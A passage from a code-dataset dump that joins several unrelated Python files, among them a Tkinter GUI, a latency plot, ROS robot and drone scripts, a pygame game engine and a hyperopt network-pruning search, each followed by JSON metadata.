__init__(self, parent, mainapp):\n tk.Frame.__init__(self, parent)\n self.config(bg=mainapp.Background1)\n\n for i in range(0,5):\n self.grid_rowconfigure(i, weight=1)\n for j in range(0,8):\n self.grid_columnconfigure(j, weight=1)\n\n\n # Create error file inputs\n self.errfile_var=dict()\n self.errfile_lab=dict()\n\n for j in range(0, 8):\n tk.Label(self, text='Mineral '+str(j+1), font=mainapp.font_labels,\n bg=mainapp.Background1).grid(row=0, column=j, pady=(4, 0))\n\n for i in range(0, 5):\n\n self.errfile_var[(i,j)]=tk.StringVar(self)\n self.errfile_var[(i,j)].set('')\n\n self.errfile_lab[(i,j)]=tk.Label(self, textvariable=self.errfile_var[(i,j)],\n anchor='w', font=mainapp.font_inputs)\n self.errfile_lab[(i,j)].configure(bg='#c9c7c7', relief='sunken', width=15)\n self.errfile_lab[(i,j)].grid(row=i+1, column=j, sticky='nsew', padx=(0,5*(j==7)))\n\n\n\n def loaderror(self, inversepage,i,j):\n\n curr_loc=self.errfile_var[(i,j)].get()\n file_loc = filedialog.askopenfilename(filetypes=((\"Model File\", \".txt\"), (\"all files\", \"*.*\")),\n defaultextension=\".txt\", initialdir=curr_loc)\n if file_loc:\n self.errfile_var[(i,j)].set(file_loc)\n\n\n print('')\n\n\nclass InverseModelPage(tk.Frame):\n\n\n def set_nummin(self,i,nmin):\n\n for j in range(0,nmin):\n self.errorfileframe.errfile_lab[(i, j)].configure(bg='white')\n self.errorfileframe.errfile_lab[(i, j)].bind(\"\", lambda event, i=i, h=self.errorfileframe.errfile_lab[(i, j)]:\n h.configure(bg='lightgrey'))\n self.errorfileframe.errfile_lab[(i, j)].bind(\"\", lambda event, i=i, h=self.errorfileframe.errfile_lab[(i, j)]:\n h.configure(bg='white'))\n self.errorfileframe.errfile_lab[(i, j)].bind(\"\", lambda event, i=i, j=j:\n self.errorfileframe.loaderror(self, i, j))\n\n for j in range(nmin,8):\n self.errorfileframe.errfile_lab[(i, j)].configure(bg='#c9c7c7')\n self.errorfileframe.errfile_lab[(i, j)].bind(\"\",\n lambda event, i=i, h=self.errorfileframe.errfile_lab[(i, j)]:\n h.configure(bg='#c9c7c7'))\n self.errorfileframe.errfile_lab[(i, j)].bind(\"\",\n lambda event, i=i, h=self.errorfileframe.errfile_lab[(i, j)]:\n h.configure(bg='#c9c7c7'))\n self.errorfileframe.errfile_lab[(i, j)].bind(\"\", lambda event: 1+1)\n\n\n print('\\n')\n\n\n def deleteline(self,n):\n\n self.forwardmodelframe.forwardmodels_var[n].set('')\n self.set_nummin(n,0)\n for j in range(0,8):\n self.errorfileframe.errfile_var[(n,j)].set('')\n\n\n\n\n\n def __init__(self, parent):\n tk.Frame.__init__(self, parent)\n #self.grid_columnconfigure(0, weight=100)\n #self.grid_columnconfigure(2, weight=400)\n self.config(bg=parent.Background1)\n\n\n self.label = tk.Label(self, text=\"Inverse Model\")\n self.config(bg=parent.Background1)\n\n self.forwardmodelframe = ForwardModelInputs(self,parent)\n self.forwardmodelframe.grid(row=0, column=0, sticky='nsew')\n\n self.errorfileframe = ErrorFileInputs(self,parent)\n self.errorfileframe.grid(row=0, column=1, sticky='nsew')\n\n","sub_path":"inversemodeldialog.py","file_name":"inversemodeldialog.py","file_ext":"py","file_size_in_byte":6499,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"140604583","text":"import matplotlib.pyplot as plt\nimport math\n\nfile_1 = open(\"./default/data\",\"r\")\nfile_2 = open(\"./llb/data\",\"r\")\n\nt_1 = eval(file_1.readline())\nt_2 = eval(file_2.readline())\n\npdf_1 = eval(file_1.readline())\npdf_2 = eval(file_2.readline())\n\ncdf_1 = []\ncdf_1.append(1);\nfor i in range(1, len(pdf_1)):\n\tcdf_1.append(cdf_1[i-1] - pdf_1[i-1])\n\n\ncdf_2 = []\ncdf_2.append(1);\nfor i in range(1, len(pdf_2)):\n\tcdf_2.append(cdf_2[i-1] - pdf_2[i-1])\n\n\nplt.loglog(t_1, cdf_1, 'r--', label = 'Storm Default', linewidth=3)\nplt.loglog(t_2, cdf_2, 'b', label = 'Latency-based load balance', linewidth=3)\n\nplt.grid(True)\nplt.ylim((0.001,1))\nplt.xlim((0,500))\n\nplt.legend(loc = 0, frameon=False, fontsize=17)\nplt.ylabel('fraction', fontsize=17)\nplt.xlabel('tuple processing latency (msec)', fontsize=17)\nplt.tick_params(axis='both', which='major', labelsize=15)\nplt.show()\n","sub_path":"quantitative_condition/Figure5.7/LLB/llb-2/compare.py","file_name":"compare.py","file_ext":"py","file_size_in_byte":854,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"200216113","text":"#! /usr/bin/env python\n\nimport sys\nimport numpy as np\nimport rospy\nfrom multi_robot_action_move.msg import robot_pose, robot_pose_array\n\n\nclass agents_pos_publisher:\n def __init__(self):\n self._agent_pos = robot_pose_array()\n self.i = 0\n self.pos_dup = False\n _start_sub_1 = rospy.Subscriber(sys.argv[1] + \"/agent_pos\", robot_pose, self.agent_pos_Subscriber_callback)\n _start_sub_2 = rospy.Subscriber(sys.argv[2] + \"/agent_pos\", robot_pose, self.agent_pos_Subscriber_callback)\n self._agents_pos_pub = rospy.Publisher(\"agents_pos\",robot_pose_array,queue_size=1)\n\n def agent_pos_Subscriber_callback(self,msg):\n _start = robot_pose()\n _start = msg\n if len(self._agent_pos.robot_name_pose) < 1:\n self._agent_pos.robot_name_pose.append(_start)\n else:\n for pose in self._agent_pos.robot_name_pose:\n if ((round(_start.robot_pose.pose.position.x,1) == round(pose.robot_pose.pose.position.x,1)) and (round(_start.robot_pose.pose.position.y,1) == round(pose.robot_pose.pose.position.y,1))):\n self.pos_dup = True\n break\n if not self.pos_dup:\n self._agent_pos.robot_name_pose.append(_start)\n\n\n else:\n rospy.logwarn(\"The Robot start position is already appended to agent_pos %s\",_start)\n self.pos_dup = False\n while len(self._agent_pos.robot_name_pose) == 2: # give the no. w.r.t the robots\n if (self._agents_pos_pub.get_num_connections() > 0):\n self._agents_pos_pub.publish(self._agent_pos)\n self._agent_pos = robot_pose_array()\n self.i = 0\n # print(\"self._agent_pos_none\")\n # print(self._agent_pos)\n break\n\nif __name__ == \"__main__\":\n rospy.init_node('agent_pos_Subscriber_Publisher')\n A=agents_pos_publisher()\n rospy.spin()\n\n\n\n\n","sub_path":"multi_robot_action_move/scripts/multi_global_planner_agentpos_pub.py","file_name":"multi_global_planner_agentpos_pub.py","file_ext":"py","file_size_in_byte":1953,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"614666293","text":"from soldier import Soldier\nfrom vehicle import Vehicle\nfrom squad import Squad\nimport logging\nfrom random import randrange\n\n\nclass Army:\n def __init__(self, name=\"no_name\", ns=10, nv=3, strategy=\"random\"):\n self.name = name\n self.log = logging.getLogger('game')\n self.number_of_soldiers = ns\n self.number_of_vehicles = nv\n self.squads = []\n self.strategy = strategy\n self.alive = True\n self.make_squads()\n\n def make_soldiers(self):\n self.soldiers = []\n for i in range(self.number_of_soldiers):\n self.soldiers.append(Soldier())\n self.soldiers[i].set_features(i)\n\n def print_status(self):\n if self.alive:\n print(\"\\nArmy: %s\" % self.name)\n for i in self.squads:\n i.print_status()\n else:\n print(\"\\nArmy %s is dead\" % self.name)\n\n def make_vehicles(self):\n self.vehicles = []\n for i in range(self.number_of_vehicles):\n current_number_of_operators = randrange(1,4)\n current_list_of_operators = []\n check = True\n for j in self.soldiers:\n if j.vehicle_number == -1:\n check = False\n j.vehicle_number = i\n current_list_of_operators.append(j)\n current_number_of_operators -= 1\n if current_number_of_operators == 0:\n break\n if check:\n break\n self.vehicles.append(Vehicle(200))\n self.vehicles[i].set_features(current_list_of_operators, i)\n\n def make_squads(self):\n self.make_soldiers()\n self.make_vehicles()\n range_soldiers_squad = randrange(5, 10)\n range_vehicles_squad = randrange(5, 10)\n i1, i2 = 0, 0\n while True:\n number1 = 0\n number2 = 0\n current_list = []\n while number1 < range_soldiers_squad and i1 < len(self.soldiers):\n if self.soldiers[i1].vehicle_number == -1:\n number1 += 1\n current_list.append(self.soldiers[i1])\n i1 += 1\n while number2 < range_vehicles_squad and i2 < len(self.vehicles):\n number2 += 1\n current_list.append(self.vehicles[i2])\n i2 += 1\n self.squads.append(Squad(current_list, len(self.squads)))\n if i1 == len(self.soldiers) and i2 == len(self.vehicles):\n break\n\n def total_attack(self):\n total = 0\n for i in self.squads:\n total += i.get_attack()\n return total\n\n def get_total_health(self):\n total = 0\n for i in self.squads:\n total += i.get_health()\n return total\n\n # def __gt__(self, army):\n # return self.get_total_health() > army.get_total_health()\n\n def __lt__(self, army):\n return self.get_total_health() < army.get_total_health()\n\n def take_damage(self, damage):\n damage = round(damage / len(self.squads))\n for i in self.squads:\n if i.alive:\n i.take_damage(damage)\n self.check_alive()\n\n def check_alive(self):\n self.alive = False\n for i in self.squads:\n if i.alive:\n self.alive = True\n\n def attack_on(self, obj):\n if obj.alive:\n obj.take_damage(self.total_attack())\n for i in self.squads:\n i.set_experience(self.total_attack() / len(self.squads))\n","sub_path":"battle_game/army.py","file_name":"army.py","file_ext":"py","file_size_in_byte":3548,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"236995583","text":"from google.appengine.ext import ndb\n\nfrom entities import Blog, Like\nfrom router import Handler\n\n\nclass LikeHandler(Handler):\n '''Handler for the liking of comments.\n All users except the author can give likes.'''\n def post(self, url_num):\n # Retrieves the blog post and other credentials\n blog_id = ndb.Key(Blog, int(url_num))\n blog = blog_id.get()\n\n user = self.request.cookies.get('user')\n\n # Retrieves the task type\n task = self.request.get('task')\n\n if not blog.is_author(user):\n if task == 'Like':\n # Likes the blog post\n like = Like.query(Like.user == user, Like.blog == blog_id).get()\n\n # Users cannot like the same blog post more than once\n if not like:\n like = Like(user = user, blog = blog_id)\n like.put()\n else:\n # Unlikes the blog post\n like_ident = self.request.get('like_id')\n like_id = ndb.Key(Like, int(like_ident))\n like_id.delete()\n\n self.redirect('/blog/' + url_num)","sub_path":"paths/LikeHandler.py","file_name":"LikeHandler.py","file_ext":"py","file_size_in_byte":1135,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"183435935","text":"\n\nfrom numpy import arange\nimport pygame\nfrom random import randint\nfrom beam import Beam\nfrom pos import pos\nfrom drone import Drone\nfrom collision import line_circle_intersect\n\nclass Engine(object):\n def __init__(self, size):\n self.players = []\n self.beams = []\n self.entities = []\n self.size = size\n self.points = 0 \n self.game_over = False\n\n self.playersprites = pygame.sprite.RenderPlain()\n self.entitysprites = pygame.sprite.RenderPlain() \n\n\n def lose_point(self):\n self.points -= 1\n if self.points <= 0:\n # Game over\n self.game_over = True\n\n def add_player(self, player):\n self.players.append(player)\n self.playersprites.add(player)\n\n def add_entity(self, entity):\n self.entities.append(entity)\n self.entitysprites.add(entity)\n\n def remove_entity(self, entity):\n self.entities.remove(entity)\n self.entitysprites.remove(entity)\n\n def process(self):\n if not self.game_over:\n self.spawn()\n\n # Entities\n deletes = []\n for p in self.entities:\n p.process()\n if p.die:\n deletes.append(p) \n\n for d in deletes:\n self.remove_entity(d)\n \n\n\n # Players\n for p in self.players:\n p.process()\n \n self.process_beams()\n\n \n # Update sprites\n self.playersprites.update()\n self.entitysprites.update() \n\n def process_beams(self):\n self.beams = []\n for p1 in self.players:\n for p2 in self.players:\n if p1.dist_to(p2.pos) < 120.0:\n beam = Beam()\n beam.pos1 = p1.pos\n beam.pos2 = p2.pos\n beam.damage = 3\n\n self.beams.append(beam)\n\n # Make the beams take damage!\n for beam in self.beams:\n length = beam.length() \n\n for entity in self.entities:\n if line_circle_intersect(beam.pos1, beam.pos2, entity.pos, entity.radius):\n beam.make_damage(entity)\n\n def spawn(self):\n if randint(0, 50) == 0:\n drone = Drone(self)\n \n drone.pos = pos(randint(20, self.size[0]-20*2), -drone.radius-2)\n self.add_entity(drone)\n\n\n def draw(self, screen):\n self.entitysprites.draw(screen)\n self.playersprites.draw(screen)\n\n def reset(self):\n\n buf = 0.0\n # Reset player positions\n #positions = [pos(buf, buf), pos(self.size[0]-buf, buf), pos(self.size[0]-buf, self.size[1]-buf), pos(buf, self.size[1]-buf)]\n positions = [pos(self.size[0]*(i+1)/(1.0 + len(self.players)), self.size[1]-80) for i in xrange(len(self.players))] \n for i, p in enumerate(self.players):\n p.pos = positions[i]\n p.velocity = pos(0, 0)\n \n self.entities = []\n self.entitysprites = pygame.sprite.RenderPlain() \n \n self.game_over = False\n self.points = 5\n","sub_path":"engine.py","file_name":"engine.py","file_ext":"py","file_size_in_byte":3128,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"634058376","text":"import random\n\nimport numpy as np\n\nfrom ncc.data.constants import DEFAULT_MAX_TARGET_POSITIONS\nfrom ncc.data.ncc_dataset import NccDataset\nfrom ncc.data.tools import data_utils\n\n\ndef collate(samples, pad_idx, unk_idx, attrs=None):\n # no need for left padding\n if len(samples) == 0:\n return {}\n\n def merge(key):\n return data_utils.collate_tokens(\n [s[key] for s in samples],\n pad_idx,\n )\n\n src_tokens = merge('source')\n tgt_tokens = merge('target')\n\n attr_masks = {attr: [] for attr in attrs} if attrs is not None else None\n\n extends = []\n max_len = src_tokens.size(-1)\n for i, s in enumerate(samples):\n extends.append(s['extend'])\n if attr_masks is not None:\n for attr in attrs:\n attr_masks[attr].append(s['attr_masks'][attr] + max_len * i)\n if attrs:\n for attr in attrs:\n attr_masks[attr] = np.concatenate(attr_masks[attr], axis=0)\n\n ntokens = sum(sum(s['target'][s['extend']:] != pad_idx) for s in samples).item()\n\n batch = {\n 'id': [s['id'] for s in samples],\n 'net_input': {\n 'src_tokens': src_tokens,\n },\n 'target': tgt_tokens,\n 'attr_masks': attr_masks,\n 'extends': extends,\n 'ntokens': ntokens,\n }\n return batch\n\n\nclass CompletionDataset(NccDataset):\n\n def __init__(\n self, tgt, tgt_sizes, tgt_dict, extends=None,\n attrs=None, attr_indices=None, attr_dict=None,\n attrs_mapping=None, reversed_attrs_mapping=None,\n left_pad_source=False, left_pad_target=False,\n max_target_positions=DEFAULT_MAX_TARGET_POSITIONS,\n shuffle=True,\n ):\n self.tgt = tgt\n self.tgt_sizes = np.array(tgt_sizes)\n self.tgt_dict = tgt_dict\n self.extends = extends\n self.attrs = attrs\n self.attr_indices = attr_indices\n self.attr_dict = attr_dict\n self.attrs_mapping = attrs_mapping\n self.reversed_attrs_mapping = reversed_attrs_mapping\n self.left_pad_source = left_pad_source\n self.left_pad_target = left_pad_target\n self.max_target_positions = max_target_positions\n\n self.shuffle = shuffle\n\n self.pad = self.tgt_dict.pad()\n self.unk = self.tgt_dict.unk()\n\n def __getitem__(self, index):\n # Append EOS to end of tgt sentence if it does not have an EOS\n # and remove EOS from end of src sentence if it exists.\n # This is useful when we use existing datasets for opposite directions\n # i.e., when we want to use tgt_dataset as src_dataset and vice versa\n src_item = self.tgt[index][:-1]\n tgt_item = self.tgt[index][1:]\n\n extend = 0 if self.extends is None else self.extends[index].item()\n if self.attrs_mapping:\n # do not move attr_masks into cuda\n attr_masks = {attr: [] for attr in self.attrs}\n for idx, attr_idx in enumerate(self.attr_indices[index].tolist()[1:][extend:], start=extend):\n if attr_idx in self.reversed_attrs_mapping:\n attr_masks[self.reversed_attrs_mapping[attr_idx]].append(idx)\n for attr in self.attrs:\n attr_masks[attr] = np.array(attr_masks[attr])\n else:\n attr_masks = None\n\n example = {\n 'id': index,\n 'source': src_item,\n 'target': tgt_item,\n\n 'attr_masks': attr_masks,\n 'extend': extend,\n }\n return example\n\n def __len__(self):\n return len(self.tgt)\n\n def collater(self, samples):\n return collate(samples, pad_idx=self.pad, unk_idx=self.unk, attrs=self.attrs)\n\n def num_tokens(self, index):\n return self.tgt_sizes[index]\n\n def size(self, index):\n return self.tgt_sizes[index]\n\n def ordered_indices(self):\n indices = super().ordered_indices()\n indices = indices[self.tgt_sizes > 1]\n if self.shuffle:\n random.shuffle(indices)\n return indices\n","sub_path":"ncc/data/completion/completion_dataset.py","file_name":"completion_dataset.py","file_ext":"py","file_size_in_byte":4027,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"439625828","text":"import hyperopt\nfrom hyperopt import hp\nfrom hyperopt import fmin\nfrom hyperopt import tpe\nimport math\nimport numpy as np\nimport argparse\nimport time\nimport datetime\nimport os\nimport sys\nimport torch\nimport torch.nn as nn\nimport torch.optim\nfrom torch.autograd import Variable\nfrom collections import OrderedDict\n\nscript_dir = os.path.dirname(__file__)\nmodule_path = os.path.abspath(os.path.join(script_dir, '..', '..'))\ntry:\n import distiller\nexcept ImportError:\n sys.path.append(module_path)\n import distiller\nimport apputils\nfrom models import ALL_MODEL_NAMES, create_model\n\ndef float_range(val_str):\n val = float(val_str)\n if val < 0 or val >= 1:\n raise argparse.ArgumentTypeError('Must be >= 0 and < 1 (received {0})'.format(val_str))\n return val\n\nparser = argparse.ArgumentParser(description='Distiller image classification model compression')\nparser.add_argument('data', metavar='DIR', help='path to dataset')\nparser.add_argument('--arch', '-a', metavar='ARCH', default='resnet20_cifar',\n choices=ALL_MODEL_NAMES,\n help='model architecture: ' +\n ' | '.join(ALL_MODEL_NAMES) +\n ' (default: resnet20_cifar)')\nparser.add_argument('-r', '--rounds', default=10, type=int,\n metavar='R', help='max rounds (default: 10)')\nparser.add_argument('--epochs', default=120, type=int,\n metavar='E', help='epochs (default: 120)')\nparser.add_argument('-j', '--workers', default=1, type=int, metavar='N',\n help='number of data loading workers (default: 1)')\nparser.add_argument('-b', '--batch-size', default=128, type=int,\n metavar='N', help='mini-batch size (default: 128)')\nparser.add_argument('--gpus', metavar='DEV_ID', default=None,\n help='Comma-separated list of GPU device IDs to be used (default is to use all available devices)')\nparser.add_argument('--lr', '--learning-rate', default=0.01, type=float,\n metavar='LR', help='initial learning rate')\nparser.add_argument('--momentum', default=0.9, type=float, metavar='M',\n help='momentum')\nparser.add_argument('--weight-decay', '--wd', default=1e-4, type=float,\n metavar='W', help='weight decay (default: 1e-4)')\nparser.add_argument('--validation-size', '--vs', type=float_range, default=0.1,\n help='Portion of training dataset to set aside for validation')\nparser.add_argument('--deterministic', '--det', action='store_true',\n help='Ensure deterministic execution for re-producible results.')\nparser.add_argument('--resume', default='', type=str, metavar='PATH',\n help='path to latest checkpoint (default: none)')\nparser.add_argument('--method', choices=['random','tpe'],\n default='random', type=str,\n help='search method, random or tpe (default: random)')\nparser.add_argument('--pruner-constraint', '--con', action='store_true',\n help='speedup to meet the constraint')\n\n# Manual setting hyperparameters \nargs = parser.parse_args()\nprint(args)\n\nargs.dataset = 'cifar10' if 'cifar' in args.arch else 'imagenet'\nif args.gpus is not None:\n\ttry:\n\t\targs.gpus = [int(s) for s in args.gpus.split(',')]\n\texcept ValueError:\n\t\texit(1)\n\tavailable_gpus = torch.cuda.device_count()\n\tfor dev_id in args.gpus:\n\t\tif dev_id >= available_gpus:\n\t\t\texit(1)\n\t# Set default device in case the first one on the list != 0\n\ttorch.cuda.set_device(args.gpus[0])\nmodel = create_model(False, args.dataset, args.arch, device_ids=args.gpus) # Get arch state_dict\ntrain_loader, val_loader, test_loader, _ = apputils.load_data(\n args.dataset, os.path.expanduser(args.data), args.batch_size,\n args.workers, args.validation_size, args.deterministic)\n\nif(args.pruner_constraint == True):\n PrunerConstraint = True\nelse:\n PrunerConstraint = False\n\nprint('PrunerConstraint = {}'.format(PrunerConstraint))\n\nPrunerEpoch = 0\nExpected_Sparsity_Level_High = 72.5\nExpected_Sparsity_Level_Low = 67.5\ncount = 0\nglobal_min_score = 10.\n\ndef objective(space):\n global model\n global count\n global global_min_score\n \n #Explore new model\n model = create_model(False, args.dataset, args.arch, device_ids=args.gpus)\n count += 1\n # Objective function: F(Acc, Lat) = (1 - Acc.) + (alpha * Sparsity)\n accuracy = 0\n alpha = 0.3 # Super-parameter: the importance of inference time\n latency = 0.0\n sparsity = 0.0\n # Training hyperparameter\n\n if args.resume:\n model, compression_scheduler, start_epoch = apputils.load_checkpoint(\n model, chkpt_file=args.resume)\n print('resume mode: {}'.format(args.resume))\n\n print(global_min_score)\n criterion = nn.CrossEntropyLoss().cuda()\n optimizer = torch.optim.SGD(model.parameters(), lr=args.lr,\n momentum=args.momentum,\n weight_decay=args.weight_decay)\n \"\"\"\n distiller/distiller/config.py\n # Element-wise sparsity\n sparsity_levels = {net_param: sparsity_level}\n pruner = distiller.pruning.SparsityLevelParameterPruner(name='sensitivity', levels=sparsity_levels)\n policy = distiller.PruningPolicy(pruner, pruner_args=None)\n scheduler = distiller.CompressionScheduler(model)\n scheduler.add_policy(policy, epochs=[0, 2, 4])\n # Local search \n add multiple pruner for each layer\n \"\"\"\n sparsity_levels = {}\n for key, value in space.items():\n sparsity_levels[key] = value\n #print(sparsity_levels)\n\n pruner = distiller.pruning.SparsityLevelParameterPruner(name='sensitivity', levels=sparsity_levels) # for SparsityLevelParameterPruner\n # pruner = distiller.pruning.SensitivityPruner(name='sensitivity', sensitivities=sparsity_levels) # for SensitivityPruner\n policy = distiller.PruningPolicy(pruner, pruner_args=None)\n lrpolicy = distiller.LRPolicy(torch.optim.lr_scheduler.StepLR(optimizer, step_size=6, gamma=0.1))\n compression_scheduler = distiller.CompressionScheduler(model)\n compression_scheduler.add_policy(policy, epochs=[PrunerEpoch])\n # compression_scheduler.add_policy(policy, starting_epoch=0, ending_epoch=38, frequency=2)\n compression_scheduler.add_policy(lrpolicy, starting_epoch=0, ending_epoch=50, frequency=1)\n \"\"\"\n distiller/example/classifier_compression/compress_classifier.py\n For each epoch:\n compression_scheduler.on_epoch_begin(epoch)\n train()\n save_checkpoint()\n compression_scheduler.on_epoch_end(epoch)\n\n train():\n For each training step:\n compression_scheduler.on_minibatch_begin(epoch)\n output = model(input)\n loss = criterion(output, target)\n compression_scheduler.before_backward_pass(epoch)\n loss.backward()\n optimizer.step()\n compression_scheduler.on_minibatch_end(epoch)\n \"\"\"\n \n local_min_score = 2.\n for i in range(args.epochs):\n compression_scheduler.on_epoch_begin(i)\n train_accuracy = train(i,criterion, optimizer, compression_scheduler)\n val_accuracy = validate() # Validate hyperparameter setting\n t, sparsity = distiller.weights_sparsity_tbl_summary(model, return_total_sparsity=True)\n compression_scheduler.on_epoch_end(i, optimizer)\n apputils.save_checkpoint(i, args.arch, model, optimizer, compression_scheduler, train_accuracy, False,\n 'hyperopt', './')\n print('Epoch: {}, train_acc: {:.4f}, val_acc: {:.4f}, sparsity: {:.4f}'.format(i, train_accuracy, val_accuracy, sparsity))\n \n score = (1-(val_accuracy/100.)) + (alpha * (1-sparsity/100.)) # objective funtion here\n if(score < global_min_score):\n global_min_score = score\n apputils.save_checkpoint(i, args.arch, model, optimizer, compression_scheduler, train_accuracy, True, 'best', './')\n\n if(score < local_min_score):\n local_min_score = score\n\n if (PrunerConstraint == True and i >= PrunerEpoch and (sparsity < Expected_Sparsity_Level_Low or sparsity > Expected_Sparsity_Level_High)):\n break \n\n test_accuracy = test() # Validate hyperparameter setting\n\n print('{} trials: score: {:.4f}, train_acc:{:.4f}, val_acc:{:.4f}, test_acc:{:.4f}, sparsity:{:.4f}'.format(count, \n local_min_score, \n train_accuracy, \n val_accuracy, \n test_accuracy,\n sparsity))\n\n return local_min_score\n\ndef train(epoch, criterion, optimizer, compression_scheduler):\n correct = 0\n total = 0\n total_samples = len(train_loader.sampler)\n batch_size = train_loader.batch_size\n steps_per_epoch = math.ceil(total_samples / batch_size)\n for train_step, (inputs, targets) in enumerate(train_loader):\n compression_scheduler.on_minibatch_begin(epoch, train_step, steps_per_epoch, optimizer)\n inputs, targets = inputs.cuda(), targets.cuda()\n outputs = model(inputs.cuda())\n _, predicted = torch.max(outputs.data, 1)\n total += targets.size(0)\n correct += predicted.eq(targets.data).cpu().sum().data.numpy()\n loss = criterion(outputs, targets)\n compression_scheduler.before_backward_pass(epoch, train_step, steps_per_epoch, loss,\n optimizer=optimizer, return_loss_components=True)\n optimizer.zero_grad()\n loss.backward()\n optimizer.step()\n compression_scheduler.on_minibatch_end(epoch, train_step, steps_per_epoch, optimizer)\n accuracy = 100. * correct / total \n \n return accuracy\n\ndef validate():\n model.eval() \n correct = 0\n total = 0\n with torch.no_grad():\n for test_step, (inputs, targets) in enumerate(val_loader):\n inputs, targets = inputs.cuda(), targets.cuda()\n outputs = model(inputs)\n _, predicted = torch.max(outputs.data, 1)\n total += targets.size(0)\n correct += predicted.eq(targets.data).cpu().sum().data.numpy()\n accuracy = 100. * correct / total \n return accuracy\n \ndef test():\n model.eval() \n correct = 0\n total = 0\n with torch.no_grad():\n for test_step, (inputs, targets) in enumerate(test_loader):\n inputs, targets = inputs.cuda(), targets.cuda()\n outputs = model(inputs)\n _, predicted = torch.max(outputs.data, 1)\n total += targets.size(0)\n correct += predicted.eq(targets.data).cpu().sum().data.numpy()\n accuracy = 100. * correct / total \n return accuracy\n\ndef get_space():\n space = {}\n for name, parameter in model.named_parameters():\n if 'conv' in name and 'weight' in name:\n if (PrunerConstraint == True):\n space[name] = hp.uniform(name, 0.55, 0.85)\n else:\n space[name] = hp.uniform(name, 0.30, 0.99)\n\n return space\n\ndef Test_Best_Model(fname):\n global model\n model = create_model(False, args.dataset, args.arch, device_ids=args.gpus)\n model, compression_scheduler, start_epoch = apputils.load_checkpoint(\n model, chkpt_file=fname)\n test_accuracy = test()\n print('test acc: {:.4f}'.format(test_accuracy))\n\ndef main():\n #print('TPE Constraint')\n #Test_Best_Model('./tpe_constraint/best_best.pth.tar')\n #print('Random Constraint')\n #Test_Best_Model('./rnd_constraint/best_best.pth.tar')\n #print('Random No Constraint')\n #Test_Best_Model('./rnd_no_con/best_best.pth.tar')\n #Test_Best_Model('./tpe_no_con/best_best.pth.tar')\n #exit(0)\n\n space = get_space()\n if(args.method == 'random'):\n print('random')\n best = fmin(objective, space, algo=hyperopt.rand.suggest, max_evals=args.rounds)\n elif(args.method == 'tpe'):\n print('tpe')\n best = fmin(objective, space, algo=tpe.suggest, max_evals=args.rounds)\n else:\n print('Error parameter on method: only \\'random\\' or \\'tpe\\' is allowed')\n\n print(best)\n\nif __name__ == '__main__':\n main()\n\n","sub_path":"LAB4-2/source code/0686028/auto v2.py","file_name":"auto v2.py","file_ext":"py","file_size_in_byte":12267,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"441959410","text":"#!/usr/bin/env python3\n\nimport rospy\nimport smach\nimport smach_ros\nimport mavros_msgs\nfrom std_msgs.msg import Bool\nfrom mavros_msgs import srv\nfrom mavros_msgs.srv import SetMode, CommandBool\nfrom geometry_msgs.msg import PoseStamped, TwistStamped\nfrom mavros_msgs.msg import State\nfrom mavros_msgs.msg import Mavlink\n\n\nERR = 0.1\n\ngoalPose = PoseStamped()\nmavPose = PoseStamped()\nmavState = State()\n\nrepeat = Bool()\nrepeat.data = True\n\ndef MissionFlowCallback(b):\n global repeat\n repeat = b\n\ndef setPoint(x, y, z):\n global goalPose\n goalPose.pose.position.x = x\n goalPose.pose.position.y = y\n goalPose.pose.position.z = z\n posePub.publish(goalPose)\n rate.sleep()\n\ndef stateCallback(state):\n global mavState\n mavState = state\n\ndef localCallback(pose):\n global mavPose\n mavPose.pose.position.x = pose.pose.position.x\n mavPose.pose.position.y = pose.pose.position.y\n mavPose.pose.position.z = pose.pose.position.z\n\n\n\nclass Takeoff (smach.State):\n def __init__(self):\n smach.State.__init__(self, outcomes = ['start'])\n \n def execute(self, userdata):\n rospy.loginfo('Executing state Takeoff\\n')\n \n for i in range(100):\n setPoint(0, 0, 0)\n \n while mavState.mode != \"OFFBOARD\":\n result = setModeSrv(0, \"OFFBOARD\")\n rate.sleep()\n\n while not (mavState.armed):\n arm(True)\n rate.sleep()\n \n setPoint(0, 0, 5)\n while not(abs(mavPose.pose.position.x - goalPose.pose.position.x) < ERR and abs(mavPose.pose.position.y - goalPose.pose.position.y) < ERR and abs(mavPose.pose.position.z - goalPose.pose.position.z) < ERR):\n setPoint(0, 0, 5)\n\n return 'start'\n\n\nclass Square (smach.State):\n def __init__(self):\n smach.State.__init__(self, outcomes=['rep', 'end'])\n \n def execute (self, userdata):\n rospy.loginfo('Doing one more square\\n')\n\n setPoint(0, 5, 5)\n while not(abs(mavPose.pose.position.x - goalPose.pose.position.x) < ERR and abs(mavPose.pose.position.y - goalPose.pose.position.y) < ERR and abs(mavPose.pose.position.z - goalPose.pose.position.z) < ERR):\n setPoint(0, 5, 5) \n\n\n setPoint(5, 5, 5)\n while not(abs(mavPose.pose.position.x - goalPose.pose.position.x) < ERR and abs(mavPose.pose.position.y - goalPose.pose.position.y) < ERR and abs(mavPose.pose.position.z - goalPose.pose.position.z) < ERR):\n setPoint(5, 5, 5)\n \n\n setPoint(5, 0, 5)\n while not(abs(mavPose.pose.position.x - goalPose.pose.position.x) < ERR and abs(mavPose.pose.position.y - goalPose.pose.position.y) < ERR and abs(mavPose.pose.position.z - goalPose.pose.position.z) < ERR):\n\n setPoint(5, 0, 5)\n\n setPoint(0, 0, 5)\n while not(abs(mavPose.pose.position.x - goalPose.pose.position.x) < ERR and abs(mavPose.pose.position.y - goalPose.pose.position.y) < ERR and abs(mavPose.pose.position.z - goalPose.pose.position.z) < ERR):\n setPoint(0, 0, 5)\n \n print(repeat)\n \n if repeat.data:\n return 'rep'\n else:\n return 'end'\n\nclass RTL(smach.State):\n def __init__(self):\n smach.State.__init__(self, outcomes=['outcome'])\n\n def execute(self, userdata):\n setPoint(0, 0, 0)\n while not(abs(mavPose.pose.position.x - 